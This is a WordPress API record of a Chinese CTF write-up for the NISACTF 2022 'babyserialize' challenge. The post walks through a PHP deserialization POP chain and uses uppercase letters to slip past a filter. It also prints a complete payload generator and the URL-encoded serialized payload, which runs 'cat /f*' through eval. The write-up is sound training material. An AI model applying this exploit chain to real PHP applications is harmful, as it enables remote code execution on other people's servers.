{"id":2370,"date":"2025-04-11T23:08:25","date_gmt":"2025-04-11T15:08:25","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=2370"},"modified":"2025-04-11T23:08:26","modified_gmt":"2025-04-11T15:08:26","slug":"nisactf-2022babyserialize","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/04\/11\/nisactf-2022babyserialize\/","title":{"rendered":"NISACTF 2022babyserialize"},"content":{"rendered":"

\"Pasted<\/p>\n

\u4e00\u3001\u8bbf\u95ee\u7f51\u7ad9<\/h1>\n

\"Pasted<\/p>\n

\u4e8c\u3001\u5206\u6790\u4ee3\u7801<\/h1>\n
\u5934\uff1a$ser\n\n\u89e6\u53d1__call\uff1aTianXiWei->__wakeup() $ext=new Ilovetxw\n\n\u89e6\u53d1__set\uff1aIlovetxw->$huang=new four\n\n\u89e6\u53d1__tostring\uff1afour->$a=new Ilovetxw four->$fun="sixsixsix"\n\n\u89e6\u53d1__invoke\uff1aIlovetxw->$su=new NISA->__invoke() \n\n\u5c3e\uff1aNISA->__invoke()->eval($this->txw4ever) $txw4ever="system('cat flag.php')"\n<\/code><\/pre>\n
strtolower()<\/code>    \u5c06\u5b57\u7b26\u4e32\u4e2d\u7684\u6240\u6709\u5927\u5199\u5b57\u6bcd\u8f6c\u6362\u4e3a\u5c0f\u5199\u5b57\u6bcd
\n__invoke()<\/code>       \u5f53\u811a\u672c\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1
\n__set()<\/code>             \u7528\u4e8e\u5c06\u4e0d\u53ef\u8bbf\u95ee\u6216\u8005\u672a\u5b9a\u4e49\u7684\u5c5e\u6027\u8d4b\u503c\u65f6\u89e6\u53d1
\n__call()<\/code>           \u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u6216\u8005\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1
\n__wakeup()<\/code>       \u4f7f\u7528unserialize\u65f6\u89e6\u53d1
\n__tostring()<\/code>     \u628a\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1<\/p>\n
\u89e3\u9898\u601d\u8def\uff1a
\n1.\u627e\u5230\u5934\u548c\u5c3e\uff1a
\n\u5934\u662f\u53c2\u6570ser\uff0c\u5c3e\u662feval\u51fd\u6570\uff0c\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2atxw4ever\u5c5e\u6027\uff0c\u6765\u8c03\u7528\u7cfb\u7edf\u51fd\u6570\u5b9e\u73b0\u547d\u4ee4\u6267\u884c<\/p>\n
2.\u8c03\u7528eval\u51fd\u6570\uff1a
\n\u9700\u8981\u89e6\u53d1__invoke<\/code>\u51fd\u6570\uff0c__invoke<\/code>\u662f\u5bf9\u8c61\u88ab\u5f53\u505a\u51fd\u6570\u8fdb\u884c\u8c03\u7528\u65f6\u5c31\u4f1a\u89e6\u53d1\uff0c\u6211\u4eec\u53bb\u627e\u7c7b\u4f3c$a()<\/code>\u8fd9\u79cd\u7684
\n\u627e\u5230$bb()<\/code>\uff0c\u5b83\u5bf9\u5e94\u7684\u53c2\u6570\u662fsu\uff0c\u4e14\u5728\u7c7bIlovetxw\u91cc\uff0c\u6b64\u65f6$su=new NISA<\/code>
\n\"QQ_1744381940500.png\"<\/p>\n
3.\u8c03\u7528$bb()<\/code>\uff1a
\n\u9700\u8981\u89e6\u53d1__tostring<\/code>\u51fd\u6570\uff0c__tostring()<\/code>\u628a\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1
\n\u627e\u5230strtolower\u51fd\u6570\uff0c\u8be5\u51fd\u6570\u662f\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u6210\u5c0f\u5199
\nstrtolower\u51fd\u6570\u7684\u53c2\u6570\u662f$a<\/code>\uff0c\u8ba9$a=new Ilovetxw<\/code>\uff0c$fun="sixsixsix"<\/code>
\n\"Pasted<\/p>\n
4.\u8c03\u7528strtolower\u51fd\u6570\uff1a
\n\u9700\u8981\u89e6\u53d1__set<\/code>\u51fd\u6570\uff0c__set()<\/code>\u7528\u4e8e\u5c06\u4e0d\u53ef\u8bbf\u95ee\u6216\u8005\u672a\u5b9a\u4e49\u7684\u5c5e\u6027\u8d4b\u503c\u65f6\u89e6\u53d1\uff0c\u9700\u8981\u67e5\u627e\u8d4b\u503c\u8bed\u53e5
\n\u56e0\u4e3afour\u7c7b\u7684fun\u4e3a\u79c1\u6709\u5c5e\u6027\uff0c\u8ba9$huang=new four<\/code>
\n\"Pasted<\/p>\n
5.\u8c03\u7528\u8d4b\u503c\u8bed\u53e5\uff1a
\n\u9700\u8981\u89e6\u53d1__call<\/code>\u51fd\u6570\uff0c__call()<\/code>\u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u6216\u8005\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1
\n\u8ba9$ext=new Ilovetxw<\/code>
\n\"Pasted<\/p>\n
6.\u8fc7\u6ee4\u7ed5\u8fc7
\nhint\u51fd\u6570\u4f1a\u8f93\u51fa\u4e00\u4e9b\u4e1c\u897f\uff0c\u9700\u8981\u7ed5\u8fc7\uff0c\u53ea\u9700\u8981if\u4e0d\u6210\u7acb\u5c31\u884c
\n
\"Pasted<\/div>
\ncheckcheck\u51fd\u6570\u5bf9eval\u7684\u53c2\u6570\u8fdb\u884c\u8fc7\u6ee4\uff0c\u5c1d\u8bd5\u4f7f\u7528\u5927\u5199\u7ed5\u8fc7
\n\"Pasted<\/p>\n
 public $txw4ever = 'System("cat \/f*");';  \n<\/code><\/pre>\n
\u4e09\u3001\u751f\u6210payload<\/h1>\n
<?php  \n  \nclass NISA{  \n    public $fun="666";  \n    public $txw4ever = 'System("cat \/f*");';  \n  \n}  \n  \nclass TianXiWei{  \n    public $ext; \/\/5 Ilovetxw  \n    public $x;  \n  \n}  \n  \nclass Ilovetxw{  \n    public $huang; \/\/4 four  \n    public $su; \/\/2 NISA  \n  \n}  \n  \nclass four{  \n    public $a="TXW4EVER";  \n    private $fun='sixsixsix';  \n  \n}  \n  \n  \n$n = new NISA();  \n$i = new Ilovetxw();  \n$i->su = $n;  \n$f = new four();  \n$f->a = $i;  \n$i = new Ilovetxw();  \n$i->huang = $f;  \n$t = new TianXiWei();  \n$t->ext = $i;  \necho urlencode(serialize($t));\n<\/code><\/pre>\n
payload\uff1a<\/p>\n
O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A3%3A%22666%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A18%3A%22SYSTEM%28%27cat+%2Ff%2A%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D\n<\/code><\/pre>\n
\u56db\u3001\u83b7\u53d6flag<\/h1>\n
\u8f93\u5165payload\uff0c\u6210\u529f\u83b7\u5f97flag
\n\"Pasted<\/p>\n
\u603b\u7ed3<\/h1>\n
    \n
  • \n
    \u6784\u9020POP\u94fe\uff1a\u627e\u5230\u5934\u548c\u5c3e\uff0c\u518d\u901a\u8fc7\u5c3e\u627e\u5230\u5934<\/p>\n<\/li>\n
  • \n
    \u9b54\u672f\u65b9\u6cd5\uff1a
    \n__invoke()<\/code>       \u5f53\u811a\u672c\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1
    \n__set()<\/code>             \u7528\u4e8e\u5c06\u4e0d\u53ef\u8bbf\u95ee\u6216\u8005\u672a\u5b9a\u4e49\u7684\u5c5e\u6027\u8d4b\u503c\u65f6\u89e6\u53d1
    \n__call()<\/code>           \u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u6216\u8005\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1
    \n__wakeup()<\/code>       \u4f7f\u7528unserialize\u65f6\u89e6\u53d1
    \n__tostring()<\/code>     \u628a\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1<\/p>\n<\/li>\n
  • \n
    strtolower()<\/code>    \u5c06\u5b57\u7b26\u4e32\u4e2d\u7684\u6240\u6709\u5927\u5199\u5b57\u6bcd\u8f6c\u6362\u4e3a\u5c0f\u5199\u5b57\u6bcd<\/p>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
    \u4e00\u3001\u8bbf\u95ee\u7f51\u7ad9 \u4e8c\u3001\u5206\u6790\u4ee3\u7801 \u5934\uff1a$ser \u89e6\u53d1__call\uff1aTianXiWei->__wakeup()  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,22,23],"tags":[77,26,37],"class_list":["post-2370","post","type-post","status-publish","format-standard","hentry","category-ctf","category-ctf-web","category-nssctf","tag-pop","tag-rce","tag-37"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2370"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2370\/revisions"}],"predecessor-version":[{"id":2371,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2370\/revisions\/2371"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2370"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}